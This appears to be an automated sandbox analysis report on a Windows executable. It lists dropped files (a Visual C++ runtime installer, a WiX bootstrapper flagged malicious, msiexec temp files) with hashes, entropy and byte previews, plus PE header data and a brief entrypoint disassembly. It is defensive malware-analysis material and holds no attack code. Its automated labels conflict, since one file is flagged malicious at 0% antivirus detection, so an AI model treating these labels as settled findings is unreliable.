.....................................

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\vcRuntimeMinimum_x86

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2019 X86 Minimum Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508., Template: Intel;1033, Revision Number: {DC639984-8B88-4DB7-A65E-0E5CCB21EAB1}, Create Time/Date: Wed Jan 8 09:28:18 2020, Last Saved Time/Date: Wed Jan 8 09:28:18 2020, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
Category:	dropped
Size (bytes):	192512
Entropy (8bit):	6.237627585353464
Encrypted:	false
SSDEEP:	3072:VGviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdNt:8vipBaTDo1j//SZhN
MD5:	6AA3A12A374E36C6A7BD75B7627A5A7C
SHA1:	56DD5F67FE9FB9C9B70470F535FC2DD6C2DECF38
SHA-256:	AA5B428789D83FBCD60442EE253B364C5FC833C698C1DC1EB73F5559A63FB976
SHA-512:	B3A4497E3629A4ED8DB8C7D83C5D8CF2270D7DCE320CA4D5009EDB0F6CBC3F3759A2F753ED0C673EFAF521AA175E2E6D53FC609F351B8A0AA00D74BC4F179720
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe

Download File

Process:	C:\Users\user\Desktop\._cache_file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	647912
Entropy (8bit):	7.215948724836638
Encrypted:	false
SSDEEP:	12288:snMwHskY7gjcjhVIEhqgM7bWvcsi6aVhPIyP3WRCzJ9ztLz5/YTDd:6MysZgjS1hqgSC/izxf+czJZhz5Qnd
MD5:	2F9D2B6CE54F9095695B53D1AA217C7B
SHA1:	3F54934C240F1955301811D2C399728A3E6D1272
SHA-256:	0009D3F27837C3AF3F6FFF7973FAF07AFAA4B53119846F55B6F2A79F1759C757
SHA-512:	692857F960F26039C7B0AF6329E65A71E8588FF71EAAC6B956BD6E437994A8D5A470C7E75DD776E0772E473967B64D5EA0E1D8396546691316DAF4D6B8CCC237
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.u.'.u.'.u.......u.....[.u.....?.u...v.4.u...q.4.u...p...u.....".u....6.u.'.t.v.u...p.l.u....&.u.'..%.u...w.&.u.Rich'.u.........................PE..L......Z.....................v......m.............@..........................p............@..............................................;...............$...0...=.. t..T...................tt......@n..@...................$........................text.............................. ..`.rdata..............................@..@.data...@...........................@....wixburn8...........................@..@.tls................................@....gfids..............................@..@.rsrc....;.......<..................@..@.reloc...=...0...>..................@..B........................................................................................................................................................

C:\Windows\Temp\~DF007AD4CD0DB7728E.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5185025201739561
Encrypted:	false
SSDEEP:	48:Y8PhVuRc06WXikwFT5XdmF6r5SmRSVESItZQ:nhV1WwFTLmFQ5VR3hZQ
MD5:	CC87C2B2FD69908CCD385F604BEAB1A3
SHA1:	C0F5312A1A0EE6317EB1357F3B56AE9BF21F4311
SHA-256:	EFB6D7B19D29D07ED59C5AE819798DC63A27DAD4FE34EDF4620E9AC55D597832
SHA-512:	516EB801C09DE39E94F466B7DE5EF909279EEDD5C26C7ABB8F02C08E9411083A33529877C15D0A4D8B83ABA43D5D46A96BB329946B9204A21FECB2B410F8B698
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF08E40FB0E5832324.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF0B75647146110BAF.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5248121879651357
Encrypted:	false
SSDEEP:	48:b8PhVuRc06WXi/FT5ydj6RLBL7qSmRSVESIVoZQc:ChV1RFTkjaLBL7qVR3JoZQc
MD5:	890E6C22F703596D12971357E9F26495
SHA1:	50A3E3BB24438B644A6BDA5E1D66A859C2093651
SHA-256:	D6D265B1A3579356580B8F5DC7C8844BEFD4E2B82EDE64A2E05BF4D2E42A34B5
SHA-512:	C6EEA42FE14C6F3FD9B5FBD76269C298FD8F25CCFDED1DC57BA26990585A67E0FEE43D65FD3F8D01440281F37FE7FE5A6C57C8B0D91B623B2F9917554336C85F
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF0EE474F2A701455A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5248121879651357
Encrypted:	false
SSDEEP:	48:b8PhVuRc06WXi/FT5ydj6RLBL7qSmRSVESIVoZQc:ChV1RFTkjaLBL7qVR3JoZQc
MD5:	890E6C22F703596D12971357E9F26495
SHA1:	50A3E3BB24438B644A6BDA5E1D66A859C2093651
SHA-256:	D6D265B1A3579356580B8F5DC7C8844BEFD4E2B82EDE64A2E05BF4D2E42A34B5
SHA-512:	C6EEA42FE14C6F3FD9B5FBD76269C298FD8F25CCFDED1DC57BA26990585A67E0FEE43D65FD3F8D01440281F37FE7FE5A6C57C8B0D91B623B2F9917554336C85F
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF263984670970722D.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF297762C254BFF3B5.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF2B2A0B2ECE73B766.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2176953699373625
Encrypted:	false
SSDEEP:	48:Zktu9s4vFXiQZT53dmF6r5SmRSVESItZQ:Wt4tZT7mFQ5VR3hZQ
MD5:	71C1D84B6E721483F2900E58E5907535
SHA1:	188915D46246DCF5561D41A22B63882A87669209
SHA-256:	0E61BAAC0E34E3A73A92C8F8FA5DA886A7AE4C9A8A49B8F6C2C6592A38E389DA
SHA-512:	1F1D597DAF0F4CCC5F507757795125A486AF0863FF12D98D83E6F152048E90F7BAE16928CAD29C31B24BA6F0C2BFB66542E6835BC070308E613D1132CE30BCB8
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF2C3A7BA7F876AD3C.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF3DC234B0039A525F.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.10315420318511248
Encrypted:	false
SSDEEP:	6:xPLG7iVCnLG7iVrKOzPLHKOJSDBsJp8z8JEM9TEkuL1dQO6iGYcBlIVky6l80t/:50i8n0itFzDHFw7zpHQEQBp801
MD5:	60ACE1ED3D1052DD04B59CF080FFE8F9
SHA1:	130ECD05D54CA74F36D0B75F565E5A7B216CACBE
SHA-256:	084EF06277D865635F060799E85D33CEFAAE0B0465DDD17559853DA5481A10B5
SHA-512:	151457DECAED8CF0B1E07A67960D7E9E35A50A091BBB9D06E7350F2AE6C898FF2C8893ABB2643315E2098157FF7FB4A3CD53F992A7EC1B3EA544E756F426B21B
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF3E2CD82C87AE7F30.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF429DD5734B43285D.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	0.1246456921710138
Encrypted:	false
SSDEEP:	24:tlZYuYsjipVvipVsS0W1VggNlGpH+fdMCl4FMClmVjLm:tlZRdS9SmRSVYQdmF6
MD5:	241845381A52FD38FC641A48717823DC
SHA1:	1532CA90FE6B7ABA2357F0229F8AD74EA72900FE
SHA-256:	B66962B5F37818E9C5A7AB80D2C7288D400644B8A8C0FDD5E292BC534F70AFC5
SHA-512:	D6F98B9042560042902B0E1622EF4B43E304C558D656F399B3316EC440A7A2558B5A3197C9FE2EA5A47B60F15D71D7F2A4349D751831C89BA5FE8D726123D74F
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5BE6FCEEEBBB684C.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5C62E65D753783C6.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2214259124985283
Encrypted:	false
SSDEEP:	48:uetujs4vFXiiT5Sdj6RLBL7qSmRSVESIVoZQc:JtW3TUjaLBL7qVR3JoZQc
MD5:	6078EE553422C8B3F68A62050E340E17
SHA1:	1A374DD6393C27FDFCB360FA4E3E39E973DE7DCC
SHA-256:	401167EBFD5E64D652FE75B3D6D4B57F2B9E0DF4BA017C080C6EE6EA1CC00239
SHA-512:	6550785D4BFBAD1BEC5B235D151D1180281C976E133FDD84634B8ED7CB40B325F7B98E156FF7BE9A1BDD17B8B4718BF5EA71C4FA8E1896419CCA83192634AF92
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF7FA31B538F858709.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	0.12691711678842807
Encrypted:	false
SSDEEP:	24:2LLZQcpWYaazipVvipVsS0W1VggNlGpn+8LdMCltLbMClmVj1LFGm1LF:4ZQcoVmS9SmRSVYtdj6RLBL
MD5:	CE70D600FAA79E0B6C416D6A1E5D7AD4
SHA1:	D890A60A3080DF14795A2722BFABD64BB1E93673
SHA-256:	BF19375F6D947CFA56ED1DC5491C2790278C0F71747B4CFB579760AFBC39D85E
SHA-512:	A27294840D3A04D641B4AF0F8876BE5ADB948B603EE186C62CD359A03565546B9BF322438EE35D6B31E0D49E552752D0C230E3C4CA5E18B4D7E0298A87BF6D90
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF838B90462CEDF291.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2176953699373625
Encrypted:	false
SSDEEP:	48:Zktu9s4vFXiQZT53dmF6r5SmRSVESItZQ:Wt4tZT7mFQ5VR3hZQ
MD5:	71C1D84B6E721483F2900E58E5907535
SHA1:	188915D46246DCF5561D41A22B63882A87669209
SHA-256:	0E61BAAC0E34E3A73A92C8F8FA5DA886A7AE4C9A8A49B8F6C2C6592A38E389DA
SHA-512:	1F1D597DAF0F4CCC5F507757795125A486AF0863FF12D98D83E6F152048E90F7BAE16928CAD29C31B24BA6F0C2BFB66542E6835BC070308E613D1132CE30BCB8
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF88666605D78DF53B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5185025201739561
Encrypted:	false
SSDEEP:	48:Y8PhVuRc06WXikwFT5XdmF6r5SmRSVESItZQ:nhV1WwFTLmFQ5VR3hZQ
MD5:	CC87C2B2FD69908CCD385F604BEAB1A3
SHA1:	C0F5312A1A0EE6317EB1357F3B56AE9BF21F4311
SHA-256:	EFB6D7B19D29D07ED59C5AE819798DC63A27DAD4FE34EDF4620E9AC55D597832
SHA-512:	516EB801C09DE39E94F466B7DE5EF909279EEDD5C26C7ABB8F02C08E9411083A33529877C15D0A4D8B83ABA43D5D46A96BB329946B9204A21FECB2B410F8B698
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF952EF7256A1D7759.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA34E98CC6908E1B1.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA420FF8AFC19718E.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2214259124985283
Encrypted:	false
SSDEEP:	48:uetujs4vFXiiT5Sdj6RLBL7qSmRSVESIVoZQc:JtW3TUjaLBL7qVR3JoZQc
MD5:	6078EE553422C8B3F68A62050E340E17
SHA1:	1A374DD6393C27FDFCB360FA4E3E39E973DE7DCC
SHA-256:	401167EBFD5E64D652FE75B3D6D4B57F2B9E0DF4BA017C080C6EE6EA1CC00239
SHA-512:	6550785D4BFBAD1BEC5B235D151D1180281C976E133FDD84634B8ED7CB40B325F7B98E156FF7BE9A1BDD17B8B4718BF5EA71C4FA8E1896419CCA83192634AF92
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA98AC24B0979BBC9.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.101966517312601
Encrypted:	false
SSDEEP:	6:xPLG7iVCnLG7iVrKOzPLHKOP1/x2I2M9R9X4IOxkQliVky6lJl0t/:50i8n0itFzDHFPZx2hs9X4KQDr01
MD5:	4C576594FA66D0DC4C7A6A7AE5F90728
SHA1:	501FA73B78162CE60B28F7010F01F19C7DAC0832
SHA-256:	A75EB9D68001602F6E03987E09472D3C25851AA318AE58DB08C085E4E81D5F2E
SHA-512:	D10BE1817CB6B1004614FB05DB54FDC2DFE732C7F15934E0D0E2242D313FC61254F60B34F587D9D731A7A52EDB3394635143C249082E9E68C7F38CBFFE35E0D6
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBBF213DF8BCD9D9E.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBC533F9A81AE1B76.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFD1EDFCAF01539E34.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2176953699373625
Encrypted:	false
SSDEEP:	48:Zktu9s4vFXiQZT53dmF6r5SmRSVESItZQ:Wt4tZT7mFQ5VR3hZQ
MD5:	71C1D84B6E721483F2900E58E5907535
SHA1:	188915D46246DCF5561D41A22B63882A87669209
SHA-256:	0E61BAAC0E34E3A73A92C8F8FA5DA886A7AE4C9A8A49B8F6C2C6592A38E389DA
SHA-512:	1F1D597DAF0F4CCC5F507757795125A486AF0863FF12D98D83E6F152048E90F7BAE16928CAD29C31B24BA6F0C2BFB66542E6835BC070308E613D1132CE30BCB8
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFFF7E9DEFFAB75375.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2214259124985283
Encrypted:	false
SSDEEP:	48:uetujs4vFXiiT5Sdj6RLBL7qSmRSVESIVoZQc:JtW3TUjaLBL7qVR3JoZQc
MD5:	6078EE553422C8B3F68A62050E340E17
SHA1:	1A374DD6393C27FDFCB360FA4E3E39E973DE7DCC
SHA-256:	401167EBFD5E64D652FE75B3D6D4B57F2B9E0DF4BA017C080C6EE6EA1CC00239
SHA-512:	6550785D4BFBAD1BEC5B235D151D1180281C976E133FDD84634B8ED7CB40B325F7B98E156FF7BE9A1BDD17B8B4718BF5EA71C4FA8E1896419CCA83192634AF92
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9774907952358145
TrID:	Win32 Executable (generic) a (10002005/4) 92.57% Win32 Executable Borland Delphi 7 (665061/41) 6.16% Windows ActiveX control (116523/4) 1.08% Win32 Executable Delphi generic (14689/80) 0.14% Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:	file.exe
File size:	15'183'872 bytes
MD5:	7274b0b15c4e6d5bbe8db5aa93c65a12
SHA1:	643418b70ee7242fb4cf797e54ec78c910d32824
SHA256:	70c87af178a804f97a312d3d8d509d5c6f4a54ac07d08bacf858e6687de7e435
SHA512:	241ca5eaa520a22a1c264f2fd3307c95d78fb56c2433602e42dcf9f2eb419ed2d43d40f6524a61a1d6e696375f7ea722fd502fa939d4453d88ca63ac068be224
SSDEEP:	393216:o0d/FlptVYmfr7yBG/4JU4TRjtjUMy4i6kgsY7A:H1PpttD7yBG/QHTJtYMyke3
TLSH:	2AE63333B2904037D6B309379D6AF2241D3DFB152F24595EB7E8AD4C5F392822AB6253
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x49ab80
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	332f7ce65ead0adfb3d35147033aabe9

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0049A778h
call 00007F6E50DA4F5Dh
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
call 00007F6E50DF88A5h
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
mov edx, 0049ABE0h
call 00007F6E50DF84A4h
mov ecx, dword ptr [0049DBDCh]
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
mov edx, dword ptr [00496590h]
call 00007F6E50DF8894h
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
call 00007F6E50DF8908h
call 00007F6E50DA2A3Bh
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa0000	0x2a42	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb0000	0xdd0740	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa5000	0xa980	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0xa4018	0x21	.rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xa4000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x99bec	0x99c00	33fbe30e8a64654287edd1bf05ae7c8c	False	0.5141641260162602	data	6.572957870355296	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x9b000	0x2e54	0x3000	1f5e19e7d20c1d128443d738ac7bc610	False	0.453125	data	4.854620797809023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x9e000	0x11e5	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa0000	0x2a42	0x2c00	21ff53180b390dc06e3a1adf0e57a073	False	0.3537819602272727	data	4.919333216027082	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xa3000	0x10	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
